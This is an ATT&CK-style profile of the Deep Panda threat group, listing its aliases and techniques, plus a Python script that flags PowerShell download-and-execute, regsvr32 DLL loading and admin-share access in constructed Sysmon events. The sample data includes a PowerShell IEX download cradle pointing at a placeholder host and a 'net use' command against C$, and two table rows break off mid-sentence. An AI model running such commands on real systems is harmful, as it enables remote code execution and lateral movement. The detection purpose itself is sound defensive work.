Deep Panda
Associated Group Descriptions

| Name | Description |
|---|---|
| Shell Crew | (Citation: RSA Shell Crew) |
| WebMasters | (Citation: RSA Shell Crew) |
| KungFu Kittens | (Citation: RSA Shell Crew) |
| PinkPanther | (Citation: RSA Shell Crew) |
| Black Vine | (Citation: Symantec Black Vine) |
Techniques Used

| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk. (Citation: Alperovitch 2014) |
| Enterprise | T1546.008 | Event Triggered Execution: Accessibility Features | Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions. (Citation: RSA Shell Crew) |
| Enterprise | T1564.003 | Hide Artifacts: Hidden Window | Deep Panda has used |
| Enterprise | T1027.005 | Obfuscated Files or Information: Indicator Removal from Tools | Deep Panda has updated and modified its malware, resulting in different hash values that evade detection. (Citation: Symantec Black Vine) |
| Enterprise | T1021.002 | Remote Services: SMB/Windows Admin Shares | Deep Panda uses net.exe to connect to network shares using |
| Enterprise | T1505.003 | Server Software Component: Web Shell | Deep Panda uses Web shells on publicly accessible Web servers to access victim networks. (Citation: CrowdStrike Deep Panda Web Shells) |
| Enterprise | T1218.010 | System Binary Proxy Execution: Regsvr32 | Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks. (Citation: RSA Shell Crew) |
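Three of the rows above (T1059.001, T1021.002 and T1218.010) describe behaviour that shows up in process-creation telemetry: PowerShell pulling code over the network and running it in memory, net.exe connecting to administrative shares, and regsvr32.exe loading a DLL from an unusual location. The following script is an added example, not part of the ATT&CK page or of any vendor report cited here; it runs a small set of detection rules over constructed Sysmon-style process-creation events (the hostnames, paths, PIDs and command lines are made up) and tags each hit with the technique ID from the table, so a defender can see what a first-pass triage for these behaviours looks like.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation events (sample data, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://stage.example.invalid/a.ps1')\""},
    {"pid": 4188,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Users\Public\srv.dll"},
    {"pid": 4201,
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\FILESRV01\C$ /user:CORP\svc_backup ********"},
    # Benign look-alikes that the rules should NOT flag.
    {"pid": 4300,
     "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net view"},
    {"pid": 4301,
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
]

# T1059.001: a download primitive combined with an in-memory execution primitive.
_PS_DOWNLOAD = re.compile(r"(Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest)", re.I)
_PS_EXEC = re.compile(r"(\bIEX\b|Invoke-Expression)", re.I)
# T1218.010: regsvr32 registering a DLL that lives in a user-writable directory.
_DLL_PATH = re.compile(r"([A-Za-z]:\\.*?\.dll)", re.I)
_USER_WRITABLE = re.compile(r"\\(Users\\Public|Temp|AppData|ProgramData)\\", re.I)
# T1021.002: "net use" against a hidden administrative share (C$, ADMIN$, IPC$, ...).
_NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\b", re.I)
_ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\(?:[A-Za-z]\$|ADMIN\$|IPC\$)(?:\\|\s|$)", re.I)


def classify(event: Dict[str, object]) -> List[Tuple[str, str]]:
    """Return (technique_id, reason) pairs that match one process-creation event."""
    image = str(event["image"]).lower()
    cmd = str(event["cmdline"])
    findings: List[Tuple[str, str]] = []

    if image.endswith("powershell.exe") and _PS_DOWNLOAD.search(cmd) and _PS_EXEC.search(cmd):
        findings.append(("T1059.001", "PowerShell downloads content and executes it in memory"))

    if image.endswith("regsvr32.exe"):
        m = _DLL_PATH.search(cmd)
        if m and _USER_WRITABLE.search(m.group(1)):
            findings.append(("T1218.010", f"regsvr32 loading DLL from user-writable path: {m.group(1)}"))

    if image.endswith("net.exe") and _NET_USE.search(cmd) and _ADMIN_SHARE.search(cmd):
        findings.append(("T1021.002", "net use to an administrative share"))

    return findings


def triage(events: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Run classify() over a batch of events and flatten the hits to (pid, technique, reason)."""
    hits: List[Tuple[int, str, str]] = []
    for ev in events:
        for tid, reason in classify(ev):
            hits.append((int(ev["pid"]), tid, reason))  # type: ignore[arg-type]
    return hits


if __name__ == "__main__":
    for pid, tid, reason in triage(SAMPLE_EVENTS):
        print(f"pid={pid} {tid}: {reason}")
```

The rules deliberately require two signals for the PowerShell case (a download primitive and an execution primitive in the same command line), and scope the regsvr32 rule to DLLs in user-writable directories, so that ordinary vendor installers and plain `net view` enumeration do not fire. In production these patterns would be one layer of a rule set fed from EDR or Sysmon Event ID 1 data rather than a standalone script.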
References
- Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
- DiMaggio, J. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.
- RYANJ. (2014, February 20). Mo’ Shells Mo’ Problems – Deep Panda Web Shells. Retrieved September 16, 2015.
- RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.
- Cylance SPEAR Team. (2017, February 9). Shell Crew Variants Continue to Fly Under Big AV’s Radar. Retrieved February 15, 2017.
- ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
- Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China’s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.